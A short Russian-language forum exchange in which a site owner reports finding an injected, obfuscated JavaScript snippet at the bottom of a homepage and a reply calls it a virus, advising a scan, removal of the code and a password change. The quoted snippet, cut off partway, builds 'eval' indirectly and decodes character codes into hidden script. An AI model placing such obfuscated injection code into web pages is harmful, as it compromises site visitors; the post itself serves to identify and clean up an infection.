Заметил такую вещь. главная долго грузилась, я её скачал с фтп и увидел внизу кода страницы строчку.
=====
echo "<!--Injection_head[SessionId=13815F34,version=2.0,type=FindDomainName,CRC32=6C6747BB]--><script>var date=new Date(),pau=('ev'+date.getFullYear()).replace('2010','al');g=window[pau];sf=window['String'].fromCharCode;g(sf(4.5*2,59*2,48.5*2,57*2,16*2,57.5*2,58*2,57*2,16*2,30.5*2,16*2,19.5*2,52.5*2,51*2,57*2,19.5*2,29.5*2,6.5*2,5*2,4.5*2,59*2,48.5*2,57*2,16*2,57.5*2,16*2,30.5*2,16*2,19.5*2,30*2,1
=====
Примерно так. если кто знает, ответьте, что это!
Вирус пришёл к вам в гости.
1. Проверьте сайт на вирусы http://vms.drweb.com/online/
2. Удалите код
3. Поменяйте все пароли